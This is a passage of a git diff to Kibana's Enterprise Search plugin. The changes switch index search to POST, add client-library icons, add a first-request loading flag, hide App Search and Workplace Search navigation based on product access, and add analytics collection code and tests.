a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.ts b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.ts index e446522579d07..eb4edd6114d33 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.ts +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.ts @@ -24,15 +24,16 @@ export const searchDocuments = async ({ query?: string; }) => { const newIndexName = encodeURIComponent(indexName); - const route = `/internal/enterprise_search/indices/${newIndexName}/search${ - searchQuery ? `/${searchQuery}` : '' - }`; + const route = `/internal/enterprise_search/indices/${newIndexName}/search`; const query = { page: pagination.pageIndex, size: docsPerPage || pagination.pageSize, }; - return await HttpLogic.values.http.get<{ meta: Meta; results: SearchResponseBody }>(route, { + return await HttpLogic.values.http.post<{ meta: Meta; results: SearchResponseBody }>(route, { + body: JSON.stringify({ + searchQuery, + }), query, }); }; diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/components/client_libraries_popover/popover.tsx b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/components/client_libraries_popover/popover.tsx index b89f489952ab8..3ec4cab0a6ff6 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/components/client_libraries_popover/popover.tsx +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/components/client_libraries_popover/popover.tsx @@ -14,10 +14,14 @@ import { EuiContextMenuPanel, EuiContextMenuItem, EuiText, + EuiIcon, + EuiFlexItem, + EuiFlexGroup, } from '@elastic/eui'; import { i18n } from '@kbn/i18n'; +import { icons } from '../../../../../../assets/client_libraries'; import { docLinks } from '../../../../../shared/doc_links'; import { OverviewLogic } from '../../overview.logic'; @@ -25,6 +29,7 @@ import { OverviewLogic } from '../../overview.logic'; const libraries = [ { href: docLinks.clientsJavaIntroduction, + icon: icons.java, key: 'java', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.java', @@ -33,6 +38,7 @@ const libraries = [ }, { href: docLinks.clientsJsIntro, + icon: icons.javascript, key: 'javascript', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.javascript', @@ -41,6 +47,7 @@ const libraries = [ }, { href: docLinks.clientsRubyOverview, + icon: icons.ruby, key: 'ruby', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.ruby', @@ -49,6 +56,7 @@ const libraries = [ }, { href: docLinks.clientsGoIndex, + icon: icons.go, key: 'go', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.go', @@ -57,6 +65,7 @@ const libraries = [ }, { href: docLinks.clientsNetIntroduction, + icon: icons.dotnet, key: 'dotnet', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.dotnet', @@ -65,6 +74,7 @@ const libraries = [ }, { href: docLinks.clientsPhpGuide, + icon: icons.php, key: 'php', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.php', @@ -73,6 +83,7 @@ const libraries = [ }, { href: docLinks.clientsPerlGuide, + icon: icons.perl, key: 'perl', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.perl', @@ -81,6 +92,7 @@ const libraries = [ }, { href: docLinks.clientsPythonOverview, + icon: icons.python, key: 'python', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.python', @@ -89,6 +101,7 @@ const libraries = [ }, { href: docLinks.clientsRustOverview, + icon: icons.rust, key: 'rust', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.rust', @@ -116,15 +129,25 @@ export const ClientLibrariesPopover: React.FC = () => { > { - return ( - - -

{item.text}

- - - ); - })} + items={libraries.map((item) => ( + : undefined} + > + + + +

{item.text}

+ + + + + + + + ))} /> ); diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/generate_api_key_panel.tsx b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/generate_api_key_panel.tsx index 3be5632fbbefe..6a43cc82d568d 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/generate_api_key_panel.tsx +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/generate_api_key_panel.tsx @@ -37,7 +37,7 @@ export const GenerateApiKeyPanel: React.FC = () => { const cloudContext = useCloudDetails(); - const DEFAULT_URL = ':'; + const DEFAULT_URL = 'https://localhost:9200'; const searchIndexApiUrl = (cloudContext.cloudId && decodeCloudId(cloudContext.cloudId)?.elasticsearchUrl) || DEFAULT_URL; diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.test.ts b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.test.ts index 5aecc732e8f00..36157301d3bae 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.test.ts +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.test.ts @@ -30,6 +30,7 @@ const DEFAULT_VALUES = { data: undefined, hasNoIndices: false, indices: [], + isFirstRequest: true, isLoading: true, meta: DEFAULT_META, status: Status.IDLE, @@ -92,6 +93,7 @@ describe('IndicesLogic', () => { }, hasNoIndices: false, indices: elasticsearchViewIndices, + isFirstRequest: false, isLoading: false, meta: newMeta, status: Status.SUCCESS, @@ -122,6 +124,7 @@ describe('IndicesLogic', () => { }, hasNoIndices: true, indices: [], + isFirstRequest: false, isLoading: false, meta, status: Status.SUCCESS, @@ -150,6 +153,7 @@ describe('IndicesLogic', () => { }, hasNoIndices: false, indices: [], + isFirstRequest: false, isLoading: false, meta, status: Status.SUCCESS, @@ -229,6 +233,7 @@ describe('IndicesLogic', () => { }, hasNoIndices: false, indices: elasticsearchViewIndices, + isFirstRequest: false, isLoading: false, meta: DEFAULT_META, status: Status.SUCCESS, @@ -280,6 +285,7 @@ describe('IndicesLogic', () => { ingestionStatus: IngestionStatus.ERROR, }, ], + isFirstRequest: false, isLoading: false, meta: DEFAULT_META, status: Status.SUCCESS, @@ -320,6 +326,7 @@ describe('IndicesLogic', () => { ingestionStatus: IngestionStatus.CONNECTED, }, ], + isFirstRequest: false, isLoading: false, meta: DEFAULT_META, status: Status.SUCCESS, @@ -357,6 +364,7 @@ describe('IndicesLogic', () => { ingestionStatus: IngestionStatus.ERROR, }, ], + isFirstRequest: false, isLoading: false, meta: DEFAULT_META, status: Status.SUCCESS, @@ -406,6 +414,7 @@ describe('IndicesLogic', () => { ingestionStatus: IngestionStatus.SYNC_ERROR, }, ], + isFirstRequest: false, isLoading: false, meta: DEFAULT_META, status: Status.SUCCESS, diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.ts b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.ts index afdbafc7fd38c..59640a948ddbc 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.ts +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.ts @@ -43,11 +43,13 @@ export interface IndicesActions { }): { meta: Meta; returnHiddenIndices: boolean; searchQuery?: string }; makeRequest: typeof FetchIndicesAPILogic.actions.makeRequest; onPaginate(newPageIndex: number): { newPageIndex: number }; + setIsFirstRequest(): boolean; } export interface IndicesValues { data: typeof FetchIndicesAPILogic.values.data; hasNoIndices: boolean; indices: ElasticsearchViewIndex[]; + isFirstRequest: boolean; isLoading: boolean; meta: Meta; status: typeof FetchIndicesAPILogic.values.status; @@ -61,6 +63,7 @@ export const IndicesLogic = kea>({ searchQuery, }), onPaginate: (newPageIndex) => ({ newPageIndex }), + setIsFirstRequest: () => true, }, connect: { actions: [FetchIndicesAPILogic, ['makeRequest', 'apiSuccess', 'apiError']], @@ -76,6 +79,14 @@ export const IndicesLogic = kea>({ }), path: ['enterprise_search', 'content', 'indices_logic'], reducers: () => ({ + isFirstRequest: [ + true, + { + apiError: () => false, + apiSuccess: () => false, + setIsFirstRequest: () => true, + }, + ], meta: [ DEFAULT_META, { @@ -96,8 +107,8 @@ export const IndicesLogic = kea>({ (data) => (data?.indices ? data.indices.map(indexToViewIndex) : []), ], isLoading: [ - () => [selectors.status], - (status) => [Status.LOADING, Status.IDLE].includes(status), + () => [selectors.status, selectors.isFirstRequest], + (status, isFirstRequest) => [Status.LOADING, Status.IDLE].includes(status) && isFirstRequest, ], }), }); diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.test.tsx b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.test.tsx index 105d287260b57..8b20cbaadb9c0 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.test.tsx +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.test.tsx @@ -33,6 +33,7 @@ const mockValues = { const mockActions = { fetchIndices: jest.fn(), onPaginate: jest.fn(), + setIsFirstRequest: jest.fn(), }; describe('SearchIndices', () => { @@ -55,6 +56,7 @@ describe('SearchIndices', () => { expect(wrapper.find(GettingStartedSteps)).toHaveLength(1); expect(wrapper.find(ElasticsearchResources)).toHaveLength(1); + expect(mockActions.setIsFirstRequest).toHaveBeenCalled(); }); }); diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.tsx b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.tsx index b6b0f433f6d17..96019c8139c97 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.tsx +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/search_indices.tsx @@ -49,7 +49,7 @@ export const baseBreadcrumbs = [ ]; export const SearchIndices: React.FC = () => { - const { fetchIndices, onPaginate } = useActions(IndicesLogic); + const { fetchIndices, onPaginate, setIsFirstRequest } = useActions(IndicesLogic); const { meta, indices, hasNoIndices, isLoading } = useValues(IndicesLogic); const [showHiddenIndices, setShowHiddenIndices] = useState(false); const [searchQuery, setSearchValue] = useState(''); @@ -58,18 +58,29 @@ export const SearchIndices: React.FC = () => { 'enterprise-search-indices-callout-dismissed', false ); + + useEffect(() => { + // We don't want to trigger loading for each search query change, so we need this + // flag to set if the call to backend is first request. + setIsFirstRequest(); + }, []); + useEffect(() => { - fetchIndices({ meta, returnHiddenIndices: showHiddenIndices, searchQuery }); + fetchIndices({ + meta, + returnHiddenIndices: showHiddenIndices, + searchQuery, + }); }, [searchQuery, meta.page.current, showHiddenIndices]); const pageTitle = isLoading ? '' - : indices.length !== 0 - ? i18n.translate('xpack.enterpriseSearch.content.searchIndices.searchIndices.pageTitle', { - defaultMessage: 'Elasticsearch indices', - }) - : i18n.translate('xpack.enterpriseSearch.content.searchIndices.searchIndices.emptyPageTitle', { + : hasNoIndices + ? i18n.translate('xpack.enterpriseSearch.content.searchIndices.searchIndices.emptyPageTitle', { defaultMessage: 'Welcome to Enterprise Search', + }) + : i18n.translate('xpack.enterpriseSearch.content.searchIndices.searchIndices.pageTitle', { + defaultMessage: 'Elasticsearch indices', }); return ( diff --git a/x-pack/plugins/enterprise_search/public/applications/index.tsx b/x-pack/plugins/enterprise_search/public/applications/index.tsx index 45179f6b55deb..5af50fce587fe 100644 --- a/x-pack/plugins/enterprise_search/public/applications/index.tsx +++ b/x-pack/plugins/enterprise_search/public/applications/index.tsx @@ -18,7 +18,7 @@ import { I18nProvider } from '@kbn/i18n-react'; import { KibanaContextProvider, KibanaThemeProvider } from '@kbn/kibana-react-plugin/public'; -import { InitialAppData } from '../../common/types'; +import { InitialAppData, ProductAccess } from '../../common/types'; import { PluginsStart, ClientConfigType, ClientData } from '../plugin'; import { externalUrl } from './shared/enterprise_search_url'; @@ -41,6 +41,12 @@ export const renderApp = ( const { publicUrl, errorConnectingMessage, ...initialData } = data; externalUrl.enterpriseSearchUrl = publicUrl || config.host || ''; + const noProductAccess: ProductAccess = { + hasAppSearchAccess: false, + hasWorkplaceSearchAccess: false, + }; + const productAccess = data.access || noProductAccess; + const EmptyContext: FC = ({ children }) => <>{children}; const CloudContext = plugins.cloud?.CloudContextProvider || EmptyContext; @@ -49,6 +55,7 @@ export const renderApp = ( const unmountKibanaLogic = mountKibanaLogic({ config, + productAccess, charts: plugins.charts, cloud: plugins.cloud, history: params.history, diff --git a/x-pack/plugins/enterprise_search/public/applications/shared/kibana/kibana_logic.ts b/x-pack/plugins/enterprise_search/public/applications/shared/kibana/kibana_logic.ts index 07aa3974b6479..d579cf17e5be9 100644 --- a/x-pack/plugins/enterprise_search/public/applications/shared/kibana/kibana_logic.ts +++ b/x-pack/plugins/enterprise_search/public/applications/shared/kibana/kibana_logic.ts @@ -14,6 +14,8 @@ import { CloudSetup } from '@kbn/cloud-plugin/public'; import { ApplicationStart, ChromeBreadcrumb, ScopedHistory } from '@kbn/core/public'; import { SecurityPluginStart } from '@kbn/security-plugin/public'; +import { ProductAccess } from '../../../../common/types'; + import { HttpLogic } from '../http'; import { createHref, CreateHrefOptions } from '../react_router_helpers'; @@ -22,6 +24,7 @@ type RequiredFieldsOnly = { }; interface KibanaLogicProps { config: { host?: string }; + productAccess: ProductAccess; // Kibana core history: ScopedHistory; navigateToUrl: RequiredFieldsOnly; @@ -55,6 +58,7 @@ export const KibanaLogic = kea>({ }, {}, ], + productAccess: [props.productAccess, {}], security: [props.security, {}], setBreadcrumbs: [props.setBreadcrumbs, {}], setChromeIsVisible: [props.setChromeIsVisible, {}], diff --git a/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.test.tsx b/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.test.tsx index a7a59916e7d09..ccc9c93c97951 100644 --- a/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.test.tsx +++ b/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.test.tsx @@ -9,10 +9,24 @@ jest.mock('./nav_link_helpers', () => ({ generateNavLink: jest.fn(({ to, items }) => ({ href: to, items })), })); +import { setMockValues } from '../../__mocks__/kea_logic'; + +import { ProductAccess } from '../../../../common/types'; + import { useEnterpriseSearchNav } from './nav'; describe('useEnterpriseSearchContentNav', () => { + beforeEach(() => { + jest.clearAllMocks(); + }); + it('returns an array of top-level Enterprise Search nav items', () => { + const fullProductAccess: ProductAccess = { + hasAppSearchAccess: true, + hasWorkplaceSearchAccess: true, + }; + setMockValues({ productAccess: fullProductAccess }); + expect(useEnterpriseSearchNav()).toEqual([ { href: '/app/enterprise_search/overview', @@ -53,4 +67,77 @@ describe('useEnterpriseSearchContentNav', () => { }, ]); }); + + it('excludes legacy products when the user has no access to them', () => { + const noProductAccess: ProductAccess = { + hasAppSearchAccess: false, + hasWorkplaceSearchAccess: false, + }; + + setMockValues({ productAccess: noProductAccess }); + + expect(useEnterpriseSearchNav()[2]).toEqual({ + id: 'search', + items: [ + { + href: '/app/enterprise_search/elasticsearch', + id: 'elasticsearch', + name: 'Elasticsearch', + }, + ], + name: 'Search', + }); + }); + + it('excludes App Search when the user has no access to it', () => { + const workplaceSearchProductAccess: ProductAccess = { + hasAppSearchAccess: false, + hasWorkplaceSearchAccess: true, + }; + + setMockValues({ productAccess: workplaceSearchProductAccess }); + + expect(useEnterpriseSearchNav()[2]).toEqual({ + id: 'search', + items: [ + { + href: '/app/enterprise_search/elasticsearch', + id: 'elasticsearch', + name: 'Elasticsearch', + }, + { + href: '/app/enterprise_search/workplace_search', + id: 'workplace_search', + name: 'Workplace Search', + }, + ], + name: 'Search', + }); + }); + + it('excludes Workplace Search when the user has no access to it', () => { + const appSearchProductAccess: ProductAccess = { + hasAppSearchAccess: true, + hasWorkplaceSearchAccess: false, + }; + + setMockValues({ productAccess: appSearchProductAccess }); + + expect(useEnterpriseSearchNav()[2]).toEqual({ + id: 'search', + items: [ + { + href: '/app/enterprise_search/elasticsearch', + id: 'elasticsearch', + name: 'Elasticsearch', + }, + { + href: '/app/enterprise_search/app_search', + id: 'app_search', + name: 'App Search', + }, + ], + name: 'Search', + }); + }); }); diff --git a/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.tsx b/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.tsx index c1af5095126f9..3611fd0a17375 100644 --- a/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.tsx +++ b/x-pack/plugins/enterprise_search/public/applications/shared/layout/nav.tsx @@ -5,6 +5,8 @@ * 2.0. */ +import { useValues } from 'kea'; + import { EuiSideNavItemType } from '@elastic/eui'; import { i18n } from '@kbn/i18n'; @@ -16,10 +18,13 @@ import { WORKPLACE_SEARCH_PLUGIN, } from '../../../../common/constants'; import { SEARCH_INDICES_PATH } from '../../enterprise_search_content/routes'; +import { KibanaLogic } from '../kibana'; import { generateNavLink } from './nav_link_helpers'; export const useEnterpriseSearchNav = () => { + const { productAccess } = useValues(KibanaLogic); + const navItems: Array> = [ { id: 'es_overview', @@ -63,26 +68,34 @@ export const useEnterpriseSearchNav = () => { to: ELASTICSEARCH_PLUGIN.URL, }), }, - { - id: 'app_search', - name: i18n.translate('xpack.enterpriseSearch.nav.appSearchTitle', { - defaultMessage: 'App Search', - }), - ...generateNavLink({ - shouldNotCreateHref: true, - to: APP_SEARCH_PLUGIN.URL, - }), - }, - { - id: 'workplace_search', - name: i18n.translate('xpack.enterpriseSearch.nav.workplaceSearchTitle', { - defaultMessage: 'Workplace Search', - }), - ...generateNavLink({ - shouldNotCreateHref: true, - to: WORKPLACE_SEARCH_PLUGIN.URL, - }), - }, + ...(productAccess.hasAppSearchAccess + ? [ + { + id: 'app_search', + name: i18n.translate('xpack.enterpriseSearch.nav.appSearchTitle', { + defaultMessage: 'App Search', + }), + ...generateNavLink({ + shouldNotCreateHref: true, + to: APP_SEARCH_PLUGIN.URL, + }), + }, + ] + : []), + ...(productAccess.hasWorkplaceSearchAccess + ? [ + { + id: 'workplace_search', + name: i18n.translate('xpack.enterpriseSearch.nav.workplaceSearchTitle', { + defaultMessage: 'Workplace Search', + }), + ...generateNavLink({ + shouldNotCreateHref: true, + to: WORKPLACE_SEARCH_PLUGIN.URL, + }), + }, + ] + : []), ], name: i18n.translate('xpack.enterpriseSearch.nav.searchExperiencesTitle', { defaultMessage: 'Search', diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/dotnet.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/dotnet.svg new file mode 100644 index 0000000000000..30fa56d08bffc --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/dotnet.svg @@ -0,0 +1,126 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/go.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/go.svg new file mode 100644 index 0000000000000..5b5fd6e7698af --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/go.svg @@ -0,0 +1,4 @@ + + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/index.ts b/x-pack/plugins/enterprise_search/public/assets/client_libraries/index.ts new file mode 100644 index 0000000000000..0e0e774aa5bba --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/index.ts @@ -0,0 +1,28 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import dotnet from './dotnet.svg'; +import go from './go.svg'; +import java from './java.svg'; +import javascript from './javascript.svg'; +import perl from './perl.svg'; +import php from './php.svg'; +import python from './python.svg'; +import ruby from './ruby.svg'; +import rust from './rust.svg'; + +export const icons = { + dotnet, + go, + java, + javascript, + perl, + php, + python, + ruby, + rust, +}; diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/java.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/java.svg new file mode 100644 index 0000000000000..dbe654cdd99cf --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/java.svg @@ -0,0 +1,3 @@ + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/javascript.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/javascript.svg new file mode 100644 index 0000000000000..cdb7bd1a03848 --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/javascript.svg @@ -0,0 +1,4 @@ + + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/perl.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/perl.svg new file mode 100644 index 0000000000000..72a2d21cc297a --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/perl.svg @@ -0,0 +1,11 @@ + + + + + + + + + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/php.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/php.svg new file mode 100644 index 0000000000000..b80e9a92c9d5f --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/php.svg @@ -0,0 +1,3 @@ + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/python.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/python.svg new file mode 100644 index 0000000000000..b2c778e6355c5 --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/python.svg @@ -0,0 +1,19 @@ + + + + + + + + + + + + + + + + + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/ruby.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/ruby.svg new file mode 100644 index 0000000000000..0af569f1ee7ae --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/ruby.svg @@ -0,0 +1,3 @@ + + + diff --git a/x-pack/plugins/enterprise_search/public/assets/client_libraries/rust.svg b/x-pack/plugins/enterprise_search/public/assets/client_libraries/rust.svg new file mode 100644 index 0000000000000..9cbccb35b2baf --- /dev/null +++ b/x-pack/plugins/enterprise_search/public/assets/client_libraries/rust.svg @@ -0,0 +1,3 @@ + + + diff --git a/x-pack/plugins/enterprise_search/server/__mocks__/fetch_indices.mock.ts b/x-pack/plugins/enterprise_search/server/__mocks__/fetch_indices.mock.ts new file mode 100644 index 0000000000000..5305cc8ecdb55 --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/__mocks__/fetch_indices.mock.ts @@ -0,0 +1,126 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +export const mockSingleIndexResponse = { + 'search-regular-index': { + aliases: {}, + }, +}; + +export const mockSingleIndexStatsResponse = { + indices: { + 'search-regular-index': { + health: 'green', + status: 'open', + total: { + docs: { + count: 100, + deleted: 0, + }, + store: { + size_in_bytes: 108000, + }, + }, + uuid: '83a81e7e-5955-4255-b008-5d6961203f57', + }, + }, +}; + +export const mockMultiIndexResponse = { + 'hidden-index': { + aliases: { + 'alias-hidden-index': {}, + 'search-alias-hidden-index': {}, + }, + settings: { index: { hidden: 'true' } }, + }, + 'regular-index': { + aliases: { + 'alias-regular-index': {}, + 'search-alias-regular-index': {}, + }, + }, + 'search-prefixed-hidden-index': { + aliases: { + 'alias-search-prefixed-hidden-index': {}, + 'search-alias-search-prefixed-hidden-index': {}, + }, + settings: { index: { hidden: 'true' } }, + }, + 'search-prefixed-regular-index': { + aliases: { + 'alias-search-prefixed-regular-index': {}, + 'search-alias-search-prefixed-regular-index': {}, + }, + }, +}; + +export const mockMultiStatsResponse: { + indices: Record; +} = { + indices: { + 'alias-hidden-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'alias-regular-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'alias-search-prefixed-hidden-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'alias-search-prefixed-regular-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'hidden-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'regular-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'search-alias-hidden-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'search-alias-regular-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'search-alias-search-prefixed-hidden-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'search-alias-search-prefixed-regular-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'search-prefixed-hidden-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + 'search-prefixed-regular-index': { + ...mockSingleIndexStatsResponse.indices['search-regular-index'], + }, + }, +}; + +export const mockPrivilegesResponse = Object.keys(mockMultiStatsResponse.indices).reduce< + Record +>((acc, key) => { + acc[key] = { manage: true, read: true }; + return acc; +}, {}); + +export const getIndexReturnValue = (indexName: string) => { + return { + ...mockMultiStatsResponse.indices[indexName], + alias: indexName.startsWith('alias') || indexName.startsWith('search-alias'), + count: 100, + name: indexName, + privileges: { manage: true, read: true }, + total: { + ...mockMultiStatsResponse.indices[indexName].total, + store: { + size_in_bytes: '105.47kb', + }, + }, + }; +}; diff --git a/x-pack/plugins/enterprise_search/server/index.ts b/x-pack/plugins/enterprise_search/server/index.ts index 41cd17181b68b..3c409c09ff642 100644 --- a/x-pack/plugins/enterprise_search/server/index.ts +++ b/x-pack/plugins/enterprise_search/server/index.ts @@ -42,3 +42,5 @@ export const CONNECTORS_INDEX = '.elastic-connectors'; export const CONNECTORS_JOBS_INDEX = '.elastic-connectors-sync-jobs'; export const CONNECTORS_VERSION = '1'; export const CRAWLERS_INDEX = '.ent-search-actastic-crawler2_configurations'; +export const ANALYTICS_COLLECTIONS_INDEX = '.elastic-analytics-collections'; +export const ANALYTICS_VERSION = '1'; diff --git a/x-pack/plugins/enterprise_search/server/lib/analytics/add_analytics_collection.test.ts b/x-pack/plugins/enterprise_search/server/lib/analytics/add_analytics_collection.test.ts new file mode 100644 index 0000000000000..7f8e8401a37d9 --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/lib/analytics/add_analytics_collection.test.ts @@ -0,0 +1,108 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { IScopedClusterClient } from '@kbn/core-elasticsearch-server'; + +import { ANALYTICS_COLLECTIONS_INDEX } from '../..'; +import { ErrorCode } from '../../../common/types/error_codes'; + +import { addAnalyticsCollection } from './add_analytics_collection'; +import { fetchAnalyticsCollectionByName } from './fetch_analytics_collection'; +import { setupAnalyticsCollectionIndex } from './setup_indices'; + +jest.mock('./fetch_analytics_collection', () => ({ fetchAnalyticsCollectionByName: jest.fn() })); +jest.mock('./setup_indices', () => ({ + setupAnalyticsCollectionIndex: jest.fn(), +})); + +describe('add analytics collection lib function', () => { + const mockClient = { + asCurrentUser: { + index: jest.fn(), + indices: { + create: jest.fn(), + exists: jest.fn(), + refresh: jest.fn(), + }, + }, + asInternalUser: {}, + }; + + beforeEach(() => { + jest.clearAllMocks(); + }); + + it('should add analytics collection', async () => { + mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); + mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); + + await expect( + addAnalyticsCollection(mockClient as unknown as IScopedClusterClient, { + name: 'example', + }) + ).resolves.toEqual({ event_retention_day_length: 180, id: 'fakeId', name: 'example' }); + + expect(mockClient.asCurrentUser.index).toHaveBeenCalledWith({ + document: { + event_retention_day_length: 180, + name: 'example', + }, + index: ANALYTICS_COLLECTIONS_INDEX, + }); + }); + + it('should reject if index already exists', async () => { + mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); + (fetchAnalyticsCollectionByName as jest.Mock).mockImplementation(() => true); + + await expect( + addAnalyticsCollection(mockClient as unknown as IScopedClusterClient, { + name: 'index_name', + }) + ).rejects.toEqual(new Error(ErrorCode.ANALYTICS_COLLECTION_ALREADY_EXISTS)); + expect(mockClient.asCurrentUser.index).not.toHaveBeenCalled(); + }); + + it('should create index if no analytics collection index exists', async () => { + mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); + + (fetchAnalyticsCollectionByName as jest.Mock).mockImplementation(() => undefined); + + mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); + + await expect( + addAnalyticsCollection(mockClient as unknown as IScopedClusterClient, { + name: 'example', + }) + ).resolves.toEqual({ event_retention_day_length: 180, id: 'fakeId', name: 'example' }); + + expect(mockClient.asCurrentUser.index).toHaveBeenCalledWith({ + document: { + event_retention_day_length: 180, + name: 'example', + }, + index: ANALYTICS_COLLECTIONS_INDEX, + }); + + expect(setupAnalyticsCollectionIndex).toHaveBeenCalledWith(mockClient.asCurrentUser); + }); + + it('should not create index if status code is not 404', async () => { + mockClient.asCurrentUser.index.mockImplementationOnce(() => { + return Promise.reject({ statusCode: 500 }); + }); + mockClient.asCurrentUser.indices.exists.mockImplementation(() => true); + (fetchAnalyticsCollectionByName as 